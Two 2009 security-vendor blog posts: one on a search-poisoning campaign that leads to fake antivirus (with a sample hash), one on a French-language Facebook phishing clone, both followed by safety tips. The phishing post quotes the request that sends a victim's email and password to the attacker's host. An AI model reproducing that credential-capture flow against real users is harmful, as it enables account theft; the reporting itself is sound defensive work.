Are Cyber Criminals Targeting Local Events In Your City?

Sean-Paul Correll — Thu, 27 Aug 2009 21:36:00 GMT

Panda Security has a California based office in Los Angeles. We are located in close proximity to two ongoing wildfires in the Angeles Crest National Forrest that have now burned through at least 30 acres, so naturally we have been keeping an eye on it. To my surprise, I pulled up a Google search for “Angeles Crest Fire” and the result yielded a malicious link above most relevant sources.

Update: 9/01/08 - The Blackhat SEO attack has now grown significantly: http://bit.ly/7jqGc

Once clicked, the site loads and checks to make sure the user came from Google. If so, the following script begins the redirection to the Rogueware site:

The Rogueware site is designed to display a fake Antivirus scan designed scare victims into thinking that their computer is infected. If the Malware is downloaded and installed as the site suggests, the user will see a fake Antivirus program pop up on their computer. At that point it becomes very aggressive and difficult to remove.

File: Antivirus-x_x.exe
Size: 172032
MD5: 0E9BC3499560EEA9261F5883FAE2A10E
Malware Info: Adware/PersonalAntivirus.

Rogueware attacks are among the most prevalent attacks on the Internet today. You can see our latest report on them here: The Business of Rogueware (pdf)

5 Steps to Avoid Infection:

Always have up-to-date Anti-Malware software installed. If you don’t have one or if your current solution is not removing the Malware, you could download a free trial from us here: http://www.pandasecurity.com/usa/homeusers/downloads/evaluation/

Don’t rely on search engines to provide valid or safe search results. You can improve your chances of safe browsing by downloading our free Web of Trust browser plugin: http://www.pandasecurity.com/homeusers/downloads/wot/

Pay close attention to what links you are clicking on. If you don’t recognize the source you may want to research the domain in a separate search or avoid the link all together.

Rogueware attacks rely on Social Engineering (I.e. making you believe you are infected when you are not). Don’t believe it! Simply close the browser window if you see a scan appear all of the sudden. If you cannot close the window with your mouse you can try ALT+F4 to force close it.

Don’t be afraid to ask for help. Call your Antivirus Company or a tech savvy friend if you feel that you are in over your head.

Facebook Phishing Site Targets French Users

Sean-Paul Correll — Thu, 05 Feb 2009 11:18:00 GMT

Today I discovered a new Facebook phishing site targeting French users. The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Source:

Connection:

(Passing the victims credentials over to the attacker)

_{GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F}

(Redirecting to the official Facebook login page)

_{302 Moved Temporarily to https://login.facebook.com/login.php}

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks. The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

Remember, Facebook will never ask for your password in an email, Facebook message, or any medium that isn't the login page. Though you will need to re-enter your password when you set a security question, change your contact email, or send a virtual gift.
Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
Set a security question for yourself on your Account page. If somehow something malicious shuts you out of your account, you will need the answer to that question in order for our User Operations team to let you back in. (If you've already set your security question, you won't see a prompt for it on your Account page.)
Be extra aware of what website you are using to log in to Facebook (and other websites). Phishing websites can be made to look like other websites (like the Facebook log in page), and might try to disguise their urls. Be smart: www.facebook.com.profile.a36h8su2m8.info/login starts out looking like a legitimate Facebook website, but that a36h8su2m8.info part means it's fraudulent. Set and use a browser bookmark to make sure you always log in from facebook.com
If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
Use a modern web browser to benefit from anti-phishing protection
- Internet Explorer 7
- Firefox
Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.

PandaLabs : Tips

Are Cyber Criminals Targeting Local Events In Your City?

Facebook Phishing Site Targets French Users